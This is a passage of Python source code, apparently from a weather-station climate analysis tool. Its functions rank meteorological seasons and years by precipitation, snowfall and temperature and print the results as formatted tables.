<= qty: ranked_l.append(l) if m not in ranked_m and m <= qty: ranked_m.append(m) if n not in ranked_n and n <= qty: ranked_n.append(n) if YEARS_tavg[x].number != YEARS_tavg[x-1].number: i += 1 if YEARS_tavg_asc[x].number != YEARS_tavg_asc[x-1].number: j += 1 if YEARS_tmax[x].number != YEARS_tmax[x-1].number: k += 1 if YEARS_tmax_asc[x].number != YEARS_tmax_asc[x-1].number: l += 1 if YEARS_tmin[x].number != YEARS_tmin[x-1].number: m += 1 if YEARS_tmin_asc[x].number != YEARS_tmin_asc[x-1].number: n += 1 if i <= qty or j <= qty or k <= qty or l <= qty or m <= qty or n <= qty: print("{:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5}".format( i if i not in ranked_i and i <= qty else "","." if i not in ranked_i and i <= qty else " ", YEARS_tavg[x].year if i <= qty else "","{:.1f}".format(YEARS_tavg[x].number) if i <= qty else "", j if j not in ranked_j and j <= qty else "","." if j not in ranked_j and j <= qty else " ", YEARS_tavg_asc[x].year if j <= qty else "","{:.1f}".format(YEARS_tavg_asc[x].number) if j <= qty else "", k if k not in ranked_k and k <= qty else "","." if k not in ranked_k and k <= qty else " ", YEARS_tmax[x].year if k <= qty else "","{:.1f}".format(YEARS_tmax[x].number) if k <= qty else "", l if l not in ranked_l and l <= qty else "","." if l not in ranked_l and l <= qty else " ", YEARS_tmax_asc[x].year if l <= qty else "","{:.1f}".format(YEARS_tmax_asc[x].number) if l <= qty else "", m if m not in ranked_m and m <= qty else "","." if m not in ranked_m and m <= qty else " ", YEARS_tmin[x].year if m <= qty else "","{:.1f}".format(YEARS_tmin[x].number) if m <= qty else "", n if n not in ranked_n and n <= qty else "","." if n not in ranked_n and n <= qty else " ", YEARS_tmin_asc[x].year if n <= qty else "","{:.1f}".format(YEARS_tmin_asc[x].number) if n <= qty else "")) if i > qty and j > qty and k > qty and l > qty and m > qty and n > qty: break print("") def seasonRank(season,attribute,qty,**kwargs): """Returns a list of rankings (maxs and mins) for all specified meteorological seasons on record. The season ("spring", "summer", "fall", "winter") and attribute ("prcp" or "temp") must be in string format. The quantity, denoting how many rankings you desire, must be an integer. seasonRank(season,attribute,quantity) EXAMPLE: seasonRank("Spring","temp",5) -> Returns the "Top 5" Temperature- based Rankings for all Meteorological Springs on record """ class month_attr: def __init__(self,y,number): self.year = y self.number = number if attribute not in ["temp","temps","temperature","temperatures","tmax","tmin","tavg","prcp","precip","rain","snow"]: return print("* OOPS! Attribute must be 'temp' or 'prcp'. Try again!") if type(qty) != int or qty > 50 or qty < 5: return print("* SORRY! Ensure desired quantity is an integer in the range [5,50]") if attribute in ["prcp","precip","rain","snow"]: attribute = "prcp" if attribute in ["temp","temps","temperature","temperatures","tmax","tmin","tavg"]: attribute = "temp" SEASON_prcp = [] SEASON_prcp_asc = [] SEASON_prcpDAYS = [] SEASON_prcpDAYS_asc = [] SEASON_snow = [] SEASON_snow_asc = [] SEASON_snowDAYS = [] SEASON_snowDAYS_asc = [] SEASON_tavg = [] SEASON_tmax = [] SEASON_tmin = [] for y in [YR for YR in metclmt if type(YR) == int]: try: SEASON_prcp.append(month_attr(y,round(sum(metclmt[y][season]["prcp"]),2))) SEASON_prcpDAYS.append(month_attr(y,metclmt[y][season]["prcpDAYS"])) if metclmt[y][season]["recordqty"] > excludeseason: SEASON_prcp_asc.append(month_attr(y,round(sum(metclmt[y][season]["prcp"]),2))) SEASON_prcpDAYS_asc.append(month_attr(y,metclmt[y][season]["prcpDAYS"])) SEASON_snow.append(month_attr(y,round(sum(metclmt[y][season]["snow"]),1))) if metclmt[y][season]["recordqty"] > excludeseason: SEASON_snow_asc.append(month_attr(y,round(sum(metclmt[y][season]["snow"]),1))) SEASON_snowDAYS.append(month_attr(y,metclmt[y][season]["snowDAYS"])) if metclmt[y][season]["recordqty"] > excludeseason: SEASON_snowDAYS_asc.append(month_attr(y,metclmt[y][season]["snowDAYS"])) except: pass try: if len(metclmt[y][season]["tempAVGlist"]) > excludeseason_tavg: SEASON_tavg.append(month_attr(y,round(mean(metclmt[y][season]["tempAVGlist"]),1))) except: pass try: if len(metclmt[y][season]["tmax"]) > excludeseason: SEASON_tmax.append(month_attr(y,round(mean(metclmt[y][season]["tmax"]),1))) except: pass try: if len(metclmt[y][season]["tmin"]) > excludeseason: SEASON_tmin.append(month_attr(y,round(mean(metclmt[y][season]["tmin"]),1))) except: pass #SEASON_prcp_asc = SEASON_prcp.copy() SEASON_prcp.sort(key=lambda x:x.number,reverse=True) SEASON_prcp_asc.sort(key=lambda x:x.number) #SEASON_prcpDAYS_asc = SEASON_prcpDAYS.copy() SEASON_prcpDAYS.sort(key=lambda x:x.number,reverse=True) SEASON_prcpDAYS_asc.sort(key=lambda x:x.number) SEASON_snow.sort(key=lambda x:x.number,reverse=True) SEASON_snow_asc.sort(key=lambda x:x.number) SEASON_snowDAYS.sort(key=lambda x:x.number,reverse=True) SEASON_snowDAYS_asc.sort(key=lambda x:x.number) SEASON_tavg_asc = SEASON_tavg.copy() SEASON_tavg.sort(key=lambda x:x.number,reverse=True) SEASON_tavg_asc.sort(key=lambda x:x.number) SEASON_tmax_asc = SEASON_tmax.copy() SEASON_tmax.sort(key=lambda x:x.number,reverse=True) SEASON_tmax_asc.sort(key=lambda x:x.number) SEASON_tmin_asc = SEASON_tmin.copy() SEASON_tmin.sort(key=lambda x:x.number,reverse=True) SEASON_tmin_asc.sort(key=lambda x:x.number) if "seasonStatsRun" in kwargs and kwargs["seasonStatsRun"] == True: prcpaschist = sorted(list(set([x.number for x in SEASON_prcp_asc]))) prcpdeschist = sorted(list(set([x.number for x in SEASON_prcp])),reverse=True) prcpDAYSaschist = sorted(list(set([x.number for x in SEASON_prcpDAYS_asc]))) prcpDAYSdeschist = sorted(list(set([x.number for x in SEASON_prcpDAYS])),reverse=True) snowaschist = sorted(list(set([x.number for x in SEASON_snow_asc]))) snowdeschist = sorted(list(set([x.number for x in SEASON_snow])),reverse=True) snowDAYSaschist = sorted(list(set([x.number for x in SEASON_snowDAYS_asc]))) snowDAYSdeschist = sorted(list(set([x.number for x in SEASON_snowDAYS])),reverse=True) tmaxaschist = sorted(list(set([x.number for x in SEASON_tmax_asc]))) tmaxdeschist = sorted(list(set([x.number for x in SEASON_tmax])),reverse=True) tminaschist = sorted(list(set([x.number for x in SEASON_tmin_asc]))) tmindeschist = sorted(list(set([x.number for x in SEASON_tmin])),reverse=True) tavgaschist = sorted(list(set([x.number for x in SEASON_tavg_asc]))) tavgdeschist = sorted(list(set([x.number for x in SEASON_tavg])),reverse=True) return prcpaschist, prcpdeschist, prcpDAYSaschist, prcpDAYSdeschist, snowaschist, snowdeschist, snowDAYSaschist, snowDAYSdeschist, tmaxaschist, tmaxdeschist, tminaschist, tmindeschist, tavgaschist, tavgdeschist else: print("") if attribute == "prcp": print("{:^103}".format("Meteorological {} Ranked Precipitation Amounts and Days".format(season.capitalize()))) print("{:^103}".format("{}, {}".format(metclmt["station"],metclmt["station_name"]))) print("{:^103}".format("Seasons with >= {} day(s) of data".format(excludeseason+1))) print("{:-^103}".format("")) print("{:^69}|{:^33}".format("Rain","Snow")) print("{:-^69}|{:-^33}".format("","")) print("{:^18}|{:^18}|{:^15}|{:^15}|{:^17}|{:^15}".format("Wettest","Driest","Most Days","Least Days","Snowiest","Most Days")) print("{:-^18}|{:-^18}|{:-^15}|{:-^15}|{:-^17}|{:-^15}".format("","","","","","")) i = 1;j = 1;k = 1;l = 1;m = 1;n = 1 ranked_i = [];ranked_j = [];ranked_k = [];ranked_l = [];ranked_m = [];ranked_n = [] for x in range(min(len(SEASON_prcp),len(SEASON_prcp_asc),len(SEASON_prcpDAYS_asc),len(SEASON_prcpDAYS),len(SEASON_snow),len(SEASON_snowDAYS))): if x == 0: print(" {:2}{} {:4} {:>6} | {:2}{} {:4} {:>6} | {:2}{} {:4} {:>3} | {:2}{} {:4} {:>3} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>3} ".format( 1,".",SEASON_prcp[x].year,"{:.2f}".format(SEASON_prcp[x].number), 1,".",SEASON_prcp_asc[x].year,"{:.2f}".format(SEASON_prcp_asc[x].number), 1,".",SEASON_prcpDAYS[x].year,SEASON_prcpDAYS[x].number, 1,".",SEASON_prcpDAYS_asc[x].year,SEASON_prcpDAYS_asc[x].number, 1 if SEASON_snow[x].number else "","." if SEASON_snow[x].number > 0 else " ", SEASON_snow[x].year if SEASON_snow[x].number > 0 else "","{:.1f}".format(SEASON_snow[x].number) if SEASON_snow[x].number > 0 else "", 1 if SEASON_snowDAYS[x].number > 0 else "","." if SEASON_snowDAYS[x].number > 0 else " ", SEASON_snowDAYS[x].year if SEASON_snowDAYS[x].number > 0 else "",SEASON_snowDAYS[x].number if SEASON_snowDAYS[x].number > 0 else "")) ranked_i.append(i);ranked_j.append(j);ranked_k.append(k);ranked_l.append(l);ranked_m.append(m);ranked_n.append(n) else: if i not in ranked_i and i <= qty: ranked_i.append(i) if j not in ranked_j and j <= qty: ranked_j.append(j) if k not in ranked_k and k <= qty: ranked_k.append(k) if l not in ranked_l and l <= qty: ranked_l.append(l) if m not in ranked_m and m <= qty: ranked_m.append(m) if n not in ranked_n and n <= qty: ranked_n.append(n) if SEASON_prcp[x].number != SEASON_prcp[x-1].number: i += 1 if SEASON_prcp_asc[x].number != SEASON_prcp_asc[x-1].number: j += 1 if SEASON_prcpDAYS[x].number != SEASON_prcpDAYS[x-1].number: k += 1 if SEASON_prcpDAYS_asc[x].number != SEASON_prcpDAYS_asc[x-1].number: l += 1 if SEASON_snow[x].number != SEASON_snow[x-1].number: m += 1 if SEASON_snowDAYS[x].number != SEASON_snowDAYS[x-1].number: n += 1 if SEASON_prcp[x].number == 0: i = qty + 1 if SEASON_prcpDAYS[x].number == 0: k = qty + 1 if SEASON_snow[x].number == 0: m = qty + 1 if SEASON_snowDAYS[x].number == 0: n = qty + 1 if i <= qty or j <= qty or k <= qty or l <= qty or m <= qty or n <= qty: print(" {:2}{} {:4} {:>6} | {:2}{} {:4} {:>6} | {:2}{} {:4} {:>3} | {:2}{} {:4} {:>3} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>3} ".format( i if i not in ranked_i and i <= qty else "","." if i not in ranked_i and i <= qty else " ", SEASON_prcp[x].year if i <= qty else "","{:.2f}".format(SEASON_prcp[x].number) if i <= qty else "", j if j not in ranked_j and j <= qty else "","." if j not in ranked_j and j <= qty else " ", SEASON_prcp_asc[x].year if j <= qty else "","{:.2f}".format(SEASON_prcp_asc[x].number) if j <= qty else "", k if k not in ranked_k and k <= qty else "","." if k not in ranked_k and k <= qty else " ", SEASON_prcpDAYS[x].year if k <= qty else "",SEASON_prcpDAYS[x].number if k <= qty else "", l if l not in ranked_l and l <= qty else "","." if l not in ranked_l and l <= qty else " ", SEASON_prcpDAYS_asc[x].year if l <= qty else "",SEASON_prcpDAYS_asc[x].number if l <= qty else "", m if m not in ranked_m and m <= qty else "","." if m not in ranked_m and m <= qty else " ", SEASON_snow[x].year if m <= qty else "","{:.1f}".format(SEASON_snow[x].number) if m <= qty else "", n if n not in ranked_n and n <= qty else "","." if n not in ranked_n and n <= qty else " ", SEASON_snowDAYS[x].year if n <= qty else "",SEASON_snowDAYS[x].number if n <= qty else "")) if i > qty and j > qty and k > qty and l > qty and m > qty and n > qty: break if attribute == "temp": print("{:^111}".format("Meteorological {} Ranked Temperatures".format(season.capitalize()))) print("{:^111}".format("{}, {}".format(metclmt["station"],metclmt["station_name"]))) print("{:^111}".format("Seasons with >= {} day(s) of data".format(excludeseason+1))) print("{:-^111}".format("")) print("{:^36}|{:^37}|{:^36}".format("AVG TEMP","TMAX","TMIN")) print("{:-^36}|{:-^37}|{:-^36}".format("","","")) print("{:^17}|{:^18}|{:^18}|{:^18}|{:^18}|{:^17}".format("Warmest","Coolest","Warmest","Coolest","Warmest","Coolest")) print("{:-^17}|{:-^18}|{:-^18}|{:-^18}|{:-^18}|{:-^17}".format("","","","","","")) i = 1; j = 1; k = 1; l = 1; m = 1; n = 1 ranked_i = []; ranked_j = []; ranked_k = []; ranked_l = []; ranked_m = []; ranked_n = [] for x in range(len(SEASON_tmax)): if x == 0: print("{:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5}".format( 1,".",SEASON_tavg[x].year,"{:.1f}".format(SEASON_tavg[x].number), 1,".",SEASON_tavg_asc[x].year,"{:.1f}".format(SEASON_tavg_asc[x].number), 1,".",SEASON_tmax[x].year,"{:.1f}".format(SEASON_tmax[x].number), 1,".",SEASON_tmax_asc[x].year,"{:.1f}".format(SEASON_tmax_asc[x].number), 1,".",SEASON_tmin[x].year,"{:.1f}".format(SEASON_tmin[x].number), 1,".",SEASON_tmin_asc[x].year,"{:.1f}".format(SEASON_tmin_asc[x].number))) ranked_i.append(i); ranked_j.append(j); ranked_k.append(k); ranked_l.append(l); ranked_m.append(m); ranked_n.append(n) else: if i not in ranked_i and i <= qty: ranked_i.append(i) if j not in ranked_j and j <= qty: ranked_j.append(j) if k not in ranked_k and k <= qty: ranked_k.append(k) if l not in ranked_l and l <= qty: ranked_l.append(l) if m not in ranked_m and m <= qty: ranked_m.append(m) if n not in ranked_n and n <= qty: ranked_n.append(n) if SEASON_tavg[x].number != SEASON_tavg[x-1].number: i += 1 if SEASON_tavg_asc[x].number != SEASON_tavg_asc[x-1].number: j += 1 if SEASON_tmax[x].number != SEASON_tmax[x-1].number: k += 1 if SEASON_tmax_asc[x].number != SEASON_tmax_asc[x-1].number: l += 1 if SEASON_tmin[x].number != SEASON_tmin[x-1].number: m += 1 if SEASON_tmin_asc[x].number != SEASON_tmin_asc[x-1].number: n += 1 if i <= qty or j <= qty or k <= qty or l <= qty or m <= qty or n <= qty: print("{:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5}".format( i if i not in ranked_i and i <= qty else "","." if i not in ranked_i and i <= qty else " ", SEASON_tavg[x].year if i <= qty else "","{:.1f}".format(SEASON_tavg[x].number) if i <= qty else "", j if j not in ranked_j and j <= qty else "","." if j not in ranked_j and j <= qty else " ", SEASON_tavg_asc[x].year if j <= qty else "","{:.1f}".format(SEASON_tavg_asc[x].number) if j <= qty else "", k if k not in ranked_k and k <= qty else "","." if k not in ranked_k and k <= qty else " ", SEASON_tmax[x].year if k <= qty else "","{:.1f}".format(SEASON_tmax[x].number) if k <= qty else "", l if l not in ranked_l and l <= qty else "","." if l not in ranked_l and l <= qty else " ", SEASON_tmax_asc[x].year if l <= qty else "","{:.1f}".format(SEASON_tmax_asc[x].number) if l <= qty else "", m if m not in ranked_m and m <= qty else "","." if m not in ranked_m and m <= qty else " ", SEASON_tmin[x].year if m <= qty else "","{:.1f}".format(SEASON_tmin[x].number) if m <= qty else "", n if n not in ranked_n and n <= qty else "","." if n not in ranked_n and n <= qty else " ", SEASON_tmin_asc[x].year if n <= qty else "","{:.1f}".format(SEASON_tmin_asc[x].number) if n <= qty else "")) if i > qty and j > qty and k > qty and l > qty and m > qty and n > qty: break print("") def metYearRank(attribute,qty,**kwargs): """Returns a list of rankings (maxs and mins) for all meteorological years (March to February) on record. The attribute ("prcp" or "temp") must be in string format. The quantity, denoting how many rankings you desire, must be an integer. metYearRank(attribute,quantity) EXAMPLE: metYearRank("rain",12) -> Returns the "Top 12" Precip-based Rankings for all Meteorological Years on record """ class month_attr: def __init__(self,y,number): self.year = y self.number = number if attribute not in ["temp","temps","temperature","temperatures","tmax","tmin","tavg","prcp","precip","rain","snow"]: return print("* OOPS! Attribute must be 'temp' or 'prcp'. Try again!") if type(qty) != int or qty > 50 or qty < 5: return print("* SORRY! Ensure desired quantity is an integer in the range [5,50]") if attribute in ["prcp","precip","rain","snow"]: attribute = "prcp" if attribute in ["temp","temps","temperature","temperatures","tmax","tmin","tavg"]: attribute = "temp" YEARS_prcp = [] YEARS_prcp_asc = [] YEARS_prcpDAYS = [] YEARS_prcpDAYS_asc = [] YEARS_snow = [] YEARS_snow_asc = [] YEARS_snowDAYS = [] YEARS_snowDAYS_asc = [] YEARS_tavg = [] YEARS_tmax = [] YEARS_tmin = [] for y in [YR for YR in clmt if type(YR) == int]: try: YEARS_prcp.append(month_attr(y,round(sum(metclmt[y]["prcp"]),2))) YEARS_prcpDAYS.append(month_attr(y,metclmt[y]["prcpDAYS"])) if metclmt[y]["recordqty"] > excludeyear: YEARS_prcp_asc.append(month_attr(y,round(sum(metclmt[y]["prcp"]),2))) YEARS_prcpDAYS_asc.append(month_attr(y,metclmt[y]["prcpDAYS"])) YEARS_snow.append(month_attr(y,round(sum(metclmt[y]["snow"]),1))) if metclmt[y]["recordqty"] > excludeyear: YEARS_snow_asc.append(month_attr(y,round(sum(metclmt[y]["snow"]),1))) YEARS_snowDAYS.append(month_attr(y,metclmt[y]["snowDAYS"])) if metclmt[y]["recordqty"] > excludeyear: YEARS_snowDAYS_asc.append(month_attr(y,metclmt[y]["snowDAYS"])) except: pass try: if len(metclmt[y]["tempAVGlist"]) > excludeyear_tavg: YEARS_tavg.append(month_attr(y,round(mean(metclmt[y]["tempAVGlist"]),1))) except: pass try: if len(metclmt[y]["tmax"]) > excludeyear: YEARS_tmax.append(month_attr(y,round(mean(metclmt[y]["tmax"]),1))) except: pass try: if len(metclmt[y]["tmin"]) > excludeyear: YEARS_tmin.append(month_attr(y,round(mean(metclmt[y]["tmin"]),1))) except: pass #YEARS_prcp_asc = YEARS_prcp.copy() YEARS_prcp.sort(key=lambda x:x.number,reverse=True) YEARS_prcp_asc.sort(key=lambda x:x.number) #YEARS_prcpDAYS_asc = YEARS_prcpDAYS.copy() YEARS_prcpDAYS.sort(key=lambda x:x.number,reverse=True) YEARS_prcpDAYS_asc.sort(key=lambda x:x.number) YEARS_snow.sort(key=lambda x:x.number,reverse=True) YEARS_snow_asc.sort(key=lambda x:x.number) YEARS_snowDAYS.sort(key=lambda x:x.number,reverse=True) YEARS_snowDAYS_asc.sort(key=lambda x:x.number) YEARS_tavg_asc = YEARS_tavg.copy() YEARS_tavg.sort(key=lambda x:x.number,reverse=True) YEARS_tavg_asc.sort(key=lambda x:x.number) YEARS_tmax_asc = YEARS_tmax.copy() YEARS_tmax.sort(key=lambda x:x.number,reverse=True) YEARS_tmax_asc.sort(key=lambda x:x.number) YEARS_tmin_asc = YEARS_tmin.copy() YEARS_tmin.sort(key=lambda x:x.number,reverse=True) YEARS_tmin_asc.sort(key=lambda x:x.number) if "yearStatsRun" in kwargs and kwargs["yearStatsRun"] == True: prcpaschist = sorted(list(set([x.number for x in YEARS_prcp_asc]))) prcpdeschist = sorted(list(set([x.number for x in YEARS_prcp])),reverse=True) prcpDAYSaschist = sorted(list(set([x.number for x in YEARS_prcpDAYS_asc]))) prcpDAYSdeschist = sorted(list(set([x.number for x in YEARS_prcpDAYS])),reverse=True) snowaschist = sorted(list(set([x.number for x in YEARS_snow_asc]))) snowdeschist = sorted(list(set([x.number for x in YEARS_snow])),reverse=True) snowDAYSaschist = sorted(list(set([x.number for x in YEARS_snowDAYS_asc]))) snowDAYSdeschist = sorted(list(set([x.number for x in YEARS_snowDAYS])),reverse=True) tmaxaschist = sorted(list(set([x.number for x in YEARS_tmax_asc]))) tmaxdeschist = sorted(list(set([x.number for x in YEARS_tmax])),reverse=True) tminaschist = sorted(list(set([x.number for x in YEARS_tmin_asc]))) tmindeschist = sorted(list(set([x.number for x in YEARS_tmin])),reverse=True) tavgaschist = sorted(list(set([x.number for x in YEARS_tavg_asc]))) tavgdeschist = sorted(list(set([x.number for x in YEARS_tavg])),reverse=True) return prcpaschist, prcpdeschist, prcpDAYSaschist, prcpDAYSdeschist, snowaschist, snowdeschist, snowDAYSaschist, snowDAYSdeschist, tmaxaschist, tmaxdeschist, tminaschist, tmindeschist, tavgaschist, tavgdeschist else: print("") if attribute == "prcp": print("{:^103}".format("Meteorological Annual Ranked Precipitation Amounts and Days")) print("{:^103}".format("{}, {}".format(metclmt["station"],metclmt["station_name"]))) print("{:^103}".format("Years with >= {} day(s) of data".format(excludeyear+1))) print("{:-^103}".format("")) print("{:^69}|{:^33}".format("Rain","Snow")) print("{:-^69}|{:-^33}".format("","")) print("{:^18}|{:^18}|{:^15}|{:^15}|{:^17}|{:^15}".format("Wettest","Driest","Most Days","Least Days","Snowiest","Most Days")) print("{:-^18}|{:-^18}|{:-^15}|{:-^15}|{:-^17}|{:-^15}".format("","","","","","")) i = 1;j = 1;k = 1;l = 1;m = 1;n = 1 ranked_i = [];ranked_j = [];ranked_k = [];ranked_l = [];ranked_m = [];ranked_n = [] for x in range(min(len(YEARS_prcp),len(YEARS_prcp_asc),len(YEARS_prcpDAYS_asc),len(YEARS_prcpDAYS),len(YEARS_snow),len(YEARS_snowDAYS))): if x == 0: print(" {:2}{} {:4} {:>6} | {:2}{} {:4} {:>6} | {:2}{} {:4} {:>3} | {:2}{} {:4} {:>3} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>3} ".format( 1,".",YEARS_prcp[x].year,"{:.2f}".format(YEARS_prcp[x].number), 1,".",YEARS_prcp_asc[x].year,"{:.2f}".format(YEARS_prcp_asc[x].number), 1,".",YEARS_prcpDAYS[x].year,YEARS_prcpDAYS[x].number, 1,".",YEARS_prcpDAYS_asc[x].year,YEARS_prcpDAYS_asc[x].number, 1 if YEARS_snow[x].number else "","." if YEARS_snow[x].number > 0 else " ", YEARS_snow[x].year if YEARS_snow[x].number > 0 else "","{:.1f}".format(YEARS_snow[x].number) if YEARS_snow[x].number > 0 else "", 1 if YEARS_snowDAYS[x].number > 0 else "","." if YEARS_snowDAYS[x].number > 0 else " ", YEARS_snowDAYS[x].year if YEARS_snowDAYS[x].number > 0 else "",YEARS_snowDAYS[x].number if YEARS_snowDAYS[x].number > 0 else "")) ranked_i.append(i);ranked_j.append(j);ranked_k.append(k);ranked_l.append(l);ranked_m.append(m);ranked_n.append(n) else: if i not in ranked_i and i <= qty: ranked_i.append(i) if j not in ranked_j and j <= qty: ranked_j.append(j) if k not in ranked_k and k <= qty: ranked_k.append(k) if l not in ranked_l and l <= qty: ranked_l.append(l) if m not in ranked_m and m <= qty: ranked_m.append(m) if n not in ranked_n and n <= qty: ranked_n.append(n) if YEARS_prcp[x].number != YEARS_prcp[x-1].number: i += 1 if YEARS_prcp_asc[x].number != YEARS_prcp_asc[x-1].number: j += 1 if YEARS_prcpDAYS[x].number != YEARS_prcpDAYS[x-1].number: k += 1 if YEARS_prcpDAYS_asc[x].number != YEARS_prcpDAYS_asc[x-1].number: l += 1 if YEARS_snow[x].number != YEARS_snow[x-1].number: m += 1 if YEARS_snowDAYS[x].number != YEARS_snowDAYS[x-1].number: n += 1 if YEARS_prcp[x].number == 0: i = qty + 1 if YEARS_prcpDAYS[x].number == 0: k = qty + 1 if YEARS_snow[x].number == 0: m = qty + 1 if YEARS_snowDAYS[x].number == 0: n = qty + 1 if i <= qty or j <= qty or k <= qty or l <= qty or m <= qty or n <= qty: print(" {:2}{} {:4} {:>6} | {:2}{} {:4} {:>6} | {:2}{} {:4} {:>3} | {:2}{} {:4} {:>3} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>3} ".format( i if i not in ranked_i and i <= qty else "","." if i not in ranked_i and i <= qty else " ", YEARS_prcp[x].year if i <= qty else "","{:.2f}".format(YEARS_prcp[x].number) if i <= qty else "", j if j not in ranked_j and j <= qty else "","." if j not in ranked_j and j <= qty else " ", YEARS_prcp_asc[x].year if j <= qty else "","{:.2f}".format(YEARS_prcp_asc[x].number) if j <= qty else "", k if k not in ranked_k and k <= qty else "","." if k not in ranked_k and k <= qty else " ", YEARS_prcpDAYS[x].year if k <= qty else "",YEARS_prcpDAYS[x].number if k <= qty else "", l if l not in ranked_l and l <= qty else "","." if l not in ranked_l and l <= qty else " ", YEARS_prcpDAYS_asc[x].year if l <= qty else "",YEARS_prcpDAYS_asc[x].number if l <= qty else "", m if m not in ranked_m and m <= qty else "","." if m not in ranked_m and m <= qty else " ", YEARS_snow[x].year if m <= qty else "","{:.1f}".format(YEARS_snow[x].number) if m <= qty else "", n if n not in ranked_n and n <= qty else "","." if n not in ranked_n and n <= qty else " ", YEARS_snowDAYS[x].year if n <= qty else "",YEARS_snowDAYS[x].number if n <= qty else "")) if i > qty and j > qty and k > qty and l > qty and m > qty and n > qty: break if attribute == "temp": print("{:^111}".format("Meteorological Annual Ranked Temperatures")) print("{:^111}".format("{}, {}".format(metclmt["station"],metclmt["station_name"]))) print("{:^111}".format("Years with >= {} day(s) of data".format(excludeyear+1))) print("{:-^111}".format("")) print("{:^36}|{:^37}|{:^36}".format("AVG TEMP","TMAX","TMIN")) print("{:-^36}|{:-^37}|{:-^36}".format("","","")) print("{:^17}|{:^18}|{:^18}|{:^18}|{:^18}|{:^17}".format("Warmest","Coolest","Warmest","Coolest","Warmest","Coolest")) print("{:-^17}|{:-^18}|{:-^18}|{:-^18}|{:-^18}|{:-^17}".format("","","","","","")) i = 1; j = 1; k = 1; l = 1; m = 1; n = 1 ranked_i = []; ranked_j = []; ranked_k = []; ranked_l = []; ranked_m = []; ranked_n = [] for x in range(len(YEARS_tmax)): if x == 0: print("{:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5}".format( 1,".",YEARS_tavg[x].year,"{:.1f}".format(YEARS_tavg[x].number), 1,".",YEARS_tavg_asc[x].year,"{:.1f}".format(YEARS_tavg_asc[x].number), 1,".",YEARS_tmax[x].year,"{:.1f}".format(YEARS_tmax[x].number), 1,".",YEARS_tmax_asc[x].year,"{:.1f}".format(YEARS_tmax_asc[x].number), 1,".",YEARS_tmin[x].year,"{:.1f}".format(YEARS_tmin[x].number), 1,".",YEARS_tmin_asc[x].year,"{:.1f}".format(YEARS_tmin_asc[x].number))) ranked_i.append(i); ranked_j.append(j); ranked_k.append(k); ranked_l.append(l); ranked_m.append(m); ranked_n.append(n) else: if i not in ranked_i and i <= qty: ranked_i.append(i) if j not in ranked_j and j <= qty: ranked_j.append(j) if k not in ranked_k and k <= qty: ranked_k.append(k) if l not in ranked_l and l <= qty: ranked_l.append(l) if m not in ranked_m and m <= qty: ranked_m.append(m) if n not in ranked_n and n <= qty: ranked_n.append(n) if YEARS_tavg[x].number != YEARS_tavg[x-1].number: i += 1 if YEARS_tavg_asc[x].number != YEARS_tavg_asc[x-1].number: j += 1 if YEARS_tmax[x].number != YEARS_tmax[x-1].number: k += 1 if YEARS_tmax_asc[x].number != YEARS_tmax_asc[x-1].number: l += 1 if YEARS_tmin[x].number != YEARS_tmin[x-1].number: m += 1 if YEARS_tmin_asc[x].number != YEARS_tmin_asc[x-1].number: n += 1 if i <= qty or j <= qty or k <= qty or l <= qty or m <= qty or n <= qty: print("{:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5}".format( i if i not in ranked_i and i <= qty else "","." if i not in ranked_i and i <= qty else " ", YEARS_tavg[x].year if i <= qty else "","{:.1f}".format(YEARS_tavg[x].number) if i <= qty else "", j if j not in ranked_j and j <= qty else "","." if j not in ranked_j and j <= qty else " ", YEARS_tavg_asc[x].year if j <= qty else "","{:.1f}".format(YEARS_tavg_asc[x].number) if j <= qty else "", k if k not in ranked_k and k <= qty else "","." if k not in ranked_k and k <= qty else " ", YEARS_tmax[x].year if k <= qty else "","{:.1f}".format(YEARS_tmax[x].number) if k <= qty else "", l if l not in ranked_l and l <= qty else "","." if l not in ranked_l and l <= qty else " ", YEARS_tmax_asc[x].year if l <= qty else "","{:.1f}".format(YEARS_tmax_asc[x].number) if l <= qty else "", m if m not in ranked_m and m <= qty else "","." if m not in ranked_m and m <= qty else " ", YEARS_tmin[x].year if m <= qty else "","{:.1f}".format(YEARS_tmin[x].number) if m <= qty else "", n if n not in ranked_n and n <= qty else "","." if n not in ranked_n and n <= qty else " ", YEARS_tmin_asc[x].year if n <= qty else "","{:.1f}".format(YEARS_tmin_asc[x].number) if n <= qty else "")) if i > qty and j > qty and k > qty and l > qty and m > qty and n > qty: break print("") def customRank(attribute,qty,m1,d1,*date2,**kwargs): """Returns a list of rankings (maxs and mins) for all specified custom period of time. Note that the order of the passed arguments are different with this function than similar ranking functions. The attribute ("prcp" or "temp") must be a string; the quantity (how many rankings you want), M1 (month), and D1 (day), and the optional M2 and D2 must be integers. If M2 and D2 are not given, 12-31 will be considered the final date of the custom-period. The attribute ("prcp" or "temp") must be in string format. The quantity, denoting how many rankings you desire, must be an integer. If the end day given occurs before the start day in the calendar year, the end day of the following year will be used. customRank(attribute,quantity,M1,D1,*[M2,D2]) OPT *args: M2,D2 --> These optional entries represent the ending month, and day of the period EXAMPLE: customRank("temp",10,11,1) -> Returns the "Top 10" Temperature- based Rankings for the custom period of Nov 1 thru Dec 31. EXAMPLE: customRank("prcp",10,9,1,3,31) -> Returns the "Top 10" Temperature-based Rankings for the frame of Sept 1 thru Mar 31 """ class e_attr: def __init__(self,y,number): self.year = y self.number = number if len(clmt) == 0: return print("* OOPS! Run the clmtAnalyze function first.") valid_yrs = [x for x in clmt.keys() if type(x) == int] valid_yrs.sort() if any(type(x) != int for x in [m1,d1]): return print("*** OOPS! Ensure that only integers are entered ***") if len(date2) == 0: pass elif len(date2) != 2: return print("*** OOPS! For the 